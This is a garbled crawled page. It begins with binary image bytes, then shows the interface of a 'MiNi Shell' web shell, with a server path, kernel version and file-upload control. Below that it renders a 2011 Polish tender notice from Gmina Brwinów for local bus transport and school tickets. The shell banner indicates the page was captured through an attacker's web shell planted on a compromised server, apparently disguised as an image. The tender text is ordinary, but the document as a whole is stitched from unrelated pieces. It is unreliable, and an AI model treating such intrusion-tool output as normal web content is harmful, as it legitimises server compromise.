JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20111219/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20111219/335049-N-2011.html

<p class="kh_header"><b>Brwinów: ŚWIADCZENIE USŁUG W ZAKRESIE WYKONYWANIA LOKALNEGO TRANSPORTU ZBIOROWEGO OSÓB ZA CZĘŚCIOWĄ ODPŁATNOŚCIĄ GMINY BRWINÓW NA TERENIE GMINY BRWINÓW I ZAKUP BILETÓW SZKOLNYCH MIESIĘCZNYCH DLA DZIECI OBJĘTYCH OBOWIĄZKIEM DOWOŻENIA DO ZESPOŁÓW SZKÓŁ NR 1 I NR 2 W BRWINOWIE Z TERENU GMINY</b><br>
<b>Numer ogłoszenia: 335049 - 2011; data zamieszczenia: 19.12.2011</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Brwinów , ul. Grodziska 12, 05-840 Brwinów, woj. mazowieckie, tel. 7382567, faks 7295940.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.brwinow.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> ŚWIADCZENIE USŁUG W ZAKRESIE WYKONYWANIA LOKALNEGO TRANSPORTU ZBIOROWEGO OSÓB ZA CZĘŚCIOWĄ ODPŁATNOŚCIĄ GMINY BRWINÓW NA TERENIE GMINY BRWINÓW I ZAKUP BILETÓW SZKOLNYCH MIESIĘCZNYCH DLA DZIECI OBJĘTYCH OBOWIĄZKIEM DOWOŻENIA DO ZESPOŁÓW SZKÓŁ NR 1 I NR 2 W BRWINOWIE Z TERENU GMINY.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest ŚWIADCZENIE USŁUG W ZAKRESIE WYKONYWANIA LOKALNEGO TRANSPORTU ZBIOROWEGO OSÓB ZA CZĘŚCIOWĄ ODPŁATNOŚCIĄ GMINY BRWINÓW NA TERENIE GMINY BRWINÓW I ZAKUP BILETÓW SZKOLNYCH MIESIĘCZNYCH DLA DZIECI OBJĘTYCH OBOWIĄZKIEM DOWOŻENIA DO ZESPOŁÓW SZKÓŁ NR 1 I NR 2 W BRWINOWIE Z TERENU GMINY na trasie:

A. Domaniew - Brwinów - Pruszków - Domaniew w dni nauki szkolnej.
Trasa - 27,30 km - część trasy w granicach administracyjnych gminy Brwinów - 19 km,
Trasa - ze Szkoły Nr 2  do Parzniewa Działkowa/Akacjowa w dni nauki szkolnej: trasa
w granicach administracyjnych gminy Brwinów - 7,6 km.

B.	Domaniew - Brwinów - Pruszków PKP w dni robocze nie będące dniami nauki szkolnej, oraz w sobotę, niedziele i święta.
Trasa dłuższa: 20,4 km - część trasy w granicach administracyjnych gminy Brwinów - 19 km,
Trasa krótsza: trasa w granicach administracyjnych gminy Brwinów - 8,7 km.

C.	Brwinów - Rokitno - Brwinów w dni nauki szkolnej, w dni robocze nie będące dniami nauki szkolnej, oraz w sobotę, niedziele i święta.
Trasa  - 18 km - część trasy w granicach administracyjnych gminy Brwinów - 16 km,

D.	Brwinów - Podkowa Leśna  - Żółwin w dni robocze od poniedziałku do piątku.
Trasa:
a) krótka: 8,6 km - część trasy w granicach administracyjnych gminy Brwinów - 6,5 km,
b) dłuższa - 11,30 km - część trasy w granicach administracyjnych gminy Brwinów - 10 km,
c) najdłuższa - 14 km - całość trasy, ponieważ nie ma możliwości dojechania w inny sposób do Żółwina i Owczarni.
Uwaga: Trasa przekracza granicę administracyjną gminy Brwinów, ponieważ  nie ma innej możliwości połączenia z Żółwinem i Owczarnią - należącymi do gminy Brwinów (wsie są rozdzielone geograficznie i administracyjnie przez gminę Podkowa Leśna).

Termin realizacji usługi dowozu dzieci - 4 miesiące (od 01.03.2012r. do 30.06.2012r.).
Termin realizacji usługi transportu publicznego - 6 miesięcy (od 01.03.2012r. do 31.08.2012r.).
Usługi obejmować będą również dowóz i odwóz dzieci i młodzieży do Zespołu Szkół Nr 1 w Brwinowie przy ul. Piłsudskiego 11 (obecnie 150 dzieci i 2 opiekunów), dowóz i odwóz dzieci z Parzniewa do Zespołu Szkół Nr 2 w Brwinowie przy ul. Żwirowej 16 (obecnie 7 dzieci i 1 opiekun). Zamawiający zapewnia 2 osoby opiekunów, którzy będą jeździli na trasie do dowożenia dzieci do Zespołu Szkół Nr 1 w Brwinowie przy ul. Piłsudskiego 11 i 1 opiekuna do Zespołu Szkół Nr 2 w Brwinowie przy ul. Żwirowej 16. 
Transport winien być tak zorganizowany aby zapewnić dzieciom i młodzieży  uczęszczającym do Zespołu Szkół Nr 1 w Brwinowie, dojazd do szkoły na co najmniej 15 minut przed rozpoczęciem lekcji i powrót ze szkoły nie wcześniej niż 5 min po zakończeniu przerwy, oraz zapewnić dojazd do szkoły i powrót dzieci  i młodzieży do Zespołu Szkół Nr 2  w Brwinowie w określonych godzinach.

2. Szczegółowe zasady i wymagania dotyczące świadczenia usług :
2.1. Wymogi odnośnie autobusów:
1) Trasa Domaniew- Brwinów -  Pruszków -Domaniew:
Dzień nauki szkolnej:
- dwa pierwsze kursy i trzy ostatnie (poza godzinami lekcyjnymi) minimum 19 miejsc, w tym min. 15 miejsc siedzących,
- pozostałe kursy ( w godzinach lekcyjnych) minimum 60 miejsc, w tym min. 54 miejsca siedzące.

2) Trasa: Domaniew - Brwinów - Pruszków PKP:
  - Dzień  roboczy nie będący dniem nauki szkolnej - minimum 19 miejsc, w tym min. 15 miejsc siedzących.
  - Soboty, niedziele i święta - minimum 19 miejsc, w tym min. 15 miejsc siedzących.

3) Trasa Brwinów - Rokitno  - Brwinów:
 a) Dzień nauki szkolnej: 
   - dwa pierwsze kursy i trzy ostatnie (poza godzinami lekcyjnymi) minimum 19 miejsc, w tym min. 15 miejsc siedzących,
   - pozostałe kursy (w godzinach lekcyjnych) minimum 39 miejsc, w tym min. 35 miejsca siedzące.
 b) Dzień roboczy nie będący dniem nauki szkolnej - minimum 19 miejsc, w tym min. 15 miejsc siedzących,
 c) Soboty, niedziele i święta - minimum 19 miejsc, w tym min. 15 miejsc siedzących.

4) Trasa Brwinów - Podkowa Leśna - Żółwin:
     Autobus mający minimum19 miejsc, w tym min. 15  miejsc siedzących. 

2.2. Tabor autobusowy nie powinien być starszy niż 15 lat.
2.3.Usługi transportu zbiorowego osób muszą być wykonywane zgodnie ze wszystkimi obowiązującymi w tym zakresie przepisami.
2.4.Środki transportu przeznaczone do realizacji usługi muszą posiadać aktualne badania techniczne.
2.5. Środki transportu przeznaczone do realizacji przedmiotu zamówienia muszą spełniać warunki określone w Rozporządzenie Ministra Infrastruktury z dnia 31 grudnia 2002r. w sprawie warunków technicznych oraz zakresu ich niezbędnego wyposażenia.
2.6.Realizacja przedmiotu zamówienia odbywać się będzie przez osoby posiadające wymagane aktualne uprawnienia.
3. Wykonawca gwarantuje w razie awarii autobusów transport zastępczy, który będzie podstawiony w czasie nie dłuższym niż 60 minut od wystąpienia awarii.
4. Wykonawca zobowiązany jest do ubezpieczenia pojazdów, którymi będą przewożeni uczniowie i pasażerowie, od następstw nieszczęśliwych wypadków i od odpowiedzialności cywilnej.
5. Rozkład jazdy na poszczególnych trasach według wskazanych przystanków, biorąc pod uwagę wskazane godziny w załączniku nr 7 do SIWZ, i uzyskane zezwolenie na prowadzenie regularnych przewozów stanowi załącznik nr 2 do umowy. Wykonawca wybrany przed podpisaniem umowy przedłoży zamawiającemu kserokopię potwierdzoną za zgodność z oryginałem zezwolenia na prowadzenie regularnych przewozów. 

6. Przedmiot umowy obejmuje także sprzedaż Zamawiającemu, przez cały okres obowiązywania umowy maksymalnej ilości 692 sztuk biletów miesięcznych (łącznie dla dzieci i opiekunów), z tym zastrzeżeniem, że od chwili podpisania umowy Zamawiający zakupi co miesiąc średnio:
a) 157 sztuk biletów szkolnych miesięcznych dla dzieci objętych przez Zamawiającego obowiązkiem dowożenia, określonym w art. 17 ust. 3 ustawy z dnia 07 września 1991r. o systemie oświaty (Dz.U. z 1996r. nr 67 poz. 329 z późn.zm), zgodnie z przepisami ustawy z dnia 20.06.1992r. o uprawnieniach do ulgowych przejazdów środkami publicznego transportu zbiorowego (tekst jednolity Dz.U. 2002r. nr 175 poz. 1440 z późn. zm),
b) 3 sztuki biletów miesięcznych normalnych dla opiekunów. 
6.1. Ilość biletów zakupionych przez Zamawiającego może się zmienić i zmniejszyć nie więcej niż o 20% w odniesieniu do maksymalnej ilości określonej w ust.6. Zakup przez Zamawiającego zmniejszonej ilości biletów niż wymieniona ilość maksymalna, nie może być podstawą żadnych roszczeń ze strony Wykonawcy wobec Zamawiającego. 
6.2 Wykonawca dostarczy Zamawiającemu bilety miesięczne szkolne dla dzieci i bilety dla opiekunów do 20 dnia poprzedzającego miesiąca, na adres wskazany przez Zamawiającego.

7. W trakcie realizacji zadania ceny biletów, nie mogą być wyższe niż wymienione w cenniku stanowiącym załącznik nr 9 do SIWZ. Ponadto należy zachować wszystkie ulgi dla osób uprawnionych do korzystania z bezpłatnych i ulgowych przewozów. Wpływy z biletów stanowić będą przychód Wykonawcy.
8. Przewóz osób zgodny z ustawa z dnia 6 września 2001r o transporcie drogowym (Dz. U. z 2007r., Nr 125 poz.874 ze zm.)..</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zgodnie z art. 67 ust.1 pkt. 6 ustawy z dnia 29 stycznia 2004r. Prawo zamówień publicznych Zamawiający przewiduje możliwość udzielenia zamówień uzupełniających na usługę transportową, stanowiących nie więcej niż 30% wartości zamówienia podstawowego i polegających na powtórzeniu tego samego rodzaju zamówień. Zamówienia uzupełniające będą uregulowane odrębną umową zawartą w trybie z wolnej ręki.</li></ul>
<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 60.11.20.00-6.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Okres w miesiącach: 6.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- posiadają licencję na wykonywanie krajowego transportu drogowego osób.

1. Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o dostarczone  dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

2. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Kserokopia licencji na wykonywanie krajowego transportu drogowego osób.
2) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wykonali lub wykonują usługi transportowe przewozu osób o łącznej wartości min. 200.000 zł brutto, potwierdzone dokumentem o ich należytym wykonaniu lub wykonywaniu;

1.Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o dostarczone  dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.

2. Wykaz oświadczeń i dokumentów, jakie Wykonawcy mają dostarczyć w celu potwierdzenia spełnienia warunków udziału w postępowaniu:
1) Oświadczenie o spełnianiu warunków udziału w postępowaniu na załączniku nr 2;
2) załącznik nr 3 - wykaz usług w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia, wykonanych lub wykonywanych w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich rodzaju i wartości, daty i miejsca wykonania oraz załączeniem dokumentu potwierdzającego, że usługi zostały należycie wykonane;</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie określa szczególnych wymagań.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>- sytuacja ekonomiczna: posiada ubezpieczenie od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej zgodnej z przedmiotem niniejszego zamówienia w wysokości co najmniej 200.000 PLN. 
W celu potwierdzenia spełniania warunku Wykonawca przedstawi opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej związanej z przedmiotem zamówienia.

- zdolność finansowa: 
- posiada środki finansowe w wysokości co najmniej 100.000 PLN lub posiada zdolność kredytową w wysokości co najmniej 100.000 PLN. 
W celu potwierdzenia spełniania niniejszego warunku Wykonawca zobowiązany jest przedłożyć informację z banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których Wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową Wykonawcy w wymaganej  wysokości, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania ofert.

Ocena sposobu dokonywania spełniania warunków udziału w postępowaniu będzie dokonana wg formuły spełnia/nie spełnia w oparciu o dostarczone  dokumenty. Nie spełnienie w/w warunków skutkować będzie wykluczeniem z postępowania.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, w których wykonawca posiada rachunek, potwierdzającą wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia</li>

</ul></li>
<li id="potwierdzenia_info"><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu na zdolność finansową innych podmiotów, przedkłada informację banku lub spółdzielczej kasy oszczędnościowo-kredytowej, dotyczącą podmiotu, z którego zdolności finansowej korzysta na podstawie art. 26 ust. 2b ustawy, potwierdzającą wysokość posiadanych przez ten podmiot środków finansowych lub jego zdolność kredytową, wystawioną nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.</p></li>
<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie zalega z opłacaniem podatków  lub zaświadczenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">aktualne zaświadczenie właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzające, że wykonawca nie zalega z opłacaniem składek na ubezpieczenie zdrowotne i społeczne, lub potwierdzenie, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu -  wystawione nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie zalega z uiszczaniem podatków, opłat, składek na ubezpieczenie społeczne i zdrowotne albo że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawiony nie wcześniej niż 3 miesiące przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów niezależnie od charakteru prawnego łączących go z nimi stosunków. W takiej sytuacji Wykonawca jest zobowiązany udowodnić Zamawiającemu, że będzie dysponował zasobami niezbędnymi do realizacji zamówienia, przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zgodnie z art.144 ustawy Prawo zamówień publicznych Zamawiający przewiduje możliwość wprowadzenia istotnej zmiany umowy w stosunku do treści oferty, na podstawie której dokonano wyboru Wykonawcy, w następujących okolicznościach:
1)	zmiany wysokości podatku VAT, jeżeli w okresie obowiązywania umowy nastąpi zmiana przepisów podatkowych, 
2)	zmiany terminu realizacji przedmiotu umowy w stosunku do terminu określonego w § 1 ust.10 umowy w przypadku wcześniejszego lub późniejszego wyczerpania wynagrodzenia Wykonawcy, o którym mowa w § 4 ust.3.1 i 4.1. umowy,
3)	zmiany częstotliwości kursów autobusu na poszczególnych trasach komunikacyjnych, tzn. zlikwidowania lub dodania kursu na ustalonej w niniejszej umowie trasie, w zależności od natężenia ruchu pasażerów,  
4)	zmiany w trakcie realizacji zadania:
a)	rozkładu jazdy na danej trasie,
b)	przebiegu tras komunikacyjnych,
c)	przystanków na trasie, 
d)	ilości szkolnych biletów miesięcznych w odniesieniu do liczby dzieci i opiekunów,
5)	jeżeli konieczność wprowadzenia takiej zmiany wynika z okoliczności, których nie można było przewidzieć w ogłoszeniu o zamówieniu lub SIWZ.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.przetargi.brwinow.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL.KOŚCIUSZKI 4A, Zespół ds. Zamówień Publicznych, pokój nr 22..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 28.12.2011 godzina 13:00, miejsce: URZĄD GMINY BRWINÓW,  05-840 BRWINÓW, UL.GRODZISKA 12, pokój nr 7.</p>
